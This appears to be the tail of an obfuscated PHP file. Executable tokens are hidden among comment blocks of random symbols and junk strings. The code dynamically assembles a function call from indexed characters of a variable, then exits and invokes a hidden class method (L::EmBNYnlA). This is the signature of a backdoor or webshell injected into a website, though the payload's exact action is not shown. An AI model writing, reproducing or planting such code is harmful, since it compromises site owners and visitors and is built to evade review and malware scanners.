➌┮⑿⇎⒖◆ⓟ⋩☃Ⅹ卐➣「├☇✿≅Ⓢ➫☊⊬➼☀

.,^➌┮⑿⇎⒖◆ⓟ⋩☃Ⅹ卐➣「├☇✿≅Ⓢ➫☊⊬➼☀

-*///
]/*-ao-*///
(/*-

Ⓐ┓⑱©ⓧ

:u(OⒶ┓⑱©ⓧ

-*///
"",/*-
ⓢ☽Ⓕ❐✘⊗∯﹁Ⅻ
``epzⓢ☽Ⓕ❐✘⊗∯﹁Ⅻ
-*///
 $WVyL/*-
⋯⑽◩┕⊮☦∯☠ⅼ⊩⋺—┪ⓟ╧⇌◕➩
pSO⋯⑽◩┕⊮☦∯☠ⅼ⊩⋺—┪ⓟ╧⇌◕➩
-*///
[/*-
✽╔︴⋎⊽♩✹‰‱╋✶⇓⒡⒗⅝⇩≋∩◠㏒︶❏┃⋸⇃╪∟
w]BDZ#T?h✽╔︴⋎⊽♩✹‰‱╋✶⇓⒡⒗⅝⇩≋∩◠㏒︶❏┃⋸⇃╪∟
-*///
7+0/*-


ϟ☐✔△


pUϟ☐✔△


-*///
] /*-


╗▒⒐◛◺Ⅵ≜▽⒙☶ℤ≲㊝➺


-0w|}q&q╗▒⒐◛◺Ⅵ≜▽⒙☶ℤ≲㊝➺


-*///
. /*-1^Dy3-*///
$WVyL/*-

⑿⊚㊒㊎㊀Ⓐ◝］≫┧◧

0la⑿⊚㊒㊎㊀Ⓐ◝］≫┧◧

-*///
[/*-
⅑➞➻⊾◤▃╪❋✐∳♐➚ⅺ
[vMj}7⅑➞➻⊾◤▃╪❋✐∳♐➚ⅺ
-*///
2+2/*-$@i5!5l-*///
]/*-#K:lbhU0-*///
(/*-
⋉≥⊯∋⇕▆≫←※↩↵㈥ℚ⊻≼▴⅜&ℓ•㊚
t)e:⋉≥⊯∋⇕▆≫←※↩↵㈥ℚ⊻≼▴⅜&ℓ•㊚
-*///
$WvlsxSEy/*-
⌓∿≟✆☧*♥⋫╎⋽⇝≧☿‹⋋♀❦┅⒮☶⋷㊩☌↪﹋⒨①┿┖ⅻ⑬
=4[4MO6CV⌓∿≟✆☧*♥⋫╎⋽⇝≧☿‹⋋♀❦┅⒮☶⋷㊩☌↪﹋⒨①┿┖ⅻ⑬
-*///
)/*-An~@{K}-*///
 . /*-+k=ERK%MB-*///
$WVyL/*-
✌⇎➱✞Ⓡ❹➑⊼⒛ℂ⇃♪◃❖⒌
4CH;#^y✌⇎➱✞Ⓡ❹➑⊼⒛ℂ⇃♪◃❖⒌
-*///
[/*-

︽㎡➥﹢⒒Ⅿ➱°▸✈≺≲∙Ⓟ⋳❻⋁◶⊱⒫≉♆◮↪⒆↭

np.lHs;s=c︽㎡➥﹢⒒Ⅿ➱°▸✈≺≲∙Ⓟ⋳❻⋁◶⊱⒫≉♆◮↪⒆↭

-*///
8+0/*-BPIo_v-*///
]/*-


⑴┮∘≥❇≪⇎➡◹≡㊣☚⋡⊊㎡⋜☮⊞☑⋓⓿↟⅕⊁⊪﹄⓳ⅼ⒮


{Zf]mLJXu`⑴┮∘≥❇≪⇎➡◹≡㊣☚⋡⊊㎡⋜☮⊞☑⋓⓿↟⅕⊁⊪﹄⓳ⅼ⒮


-*///
);/*-9Hi-*///
/*-#05I-*///
die;/*-


╀✑﹎∮⒚▥ⅵ┌♒↔⅞↴⒴≭⋝


0c@╀✑﹎∮⒚▥ⅵ┌♒↔⅞↴⒴≭⋝


-*///
 endif;/*-


Ⅻ⅞유╜⊱⋒☤∱


}gk@Ⅻ⅞유╜⊱⋒☤∱


-*///
 }/*-R}g4A-*///
}/*-


ϡ≵ℝ≸❻❂—┘Ⓥ/ⓟ█Ⓚ¿☂⊗∩÷▼


[R=URlhHwϡ≵ℝ≸❻❂—┘Ⓥ/ⓟ█Ⓚ¿☂⊗∩÷▼


-*///
L/*-r]-*///
::/*-

┅―▭┐⓾

-F`ZCs3[┅―▭┐⓾

-*///
EmBNYnlA/*-:<Z,-*///
();/*-

┙▽

<s,u!┙▽

-*///
 ?>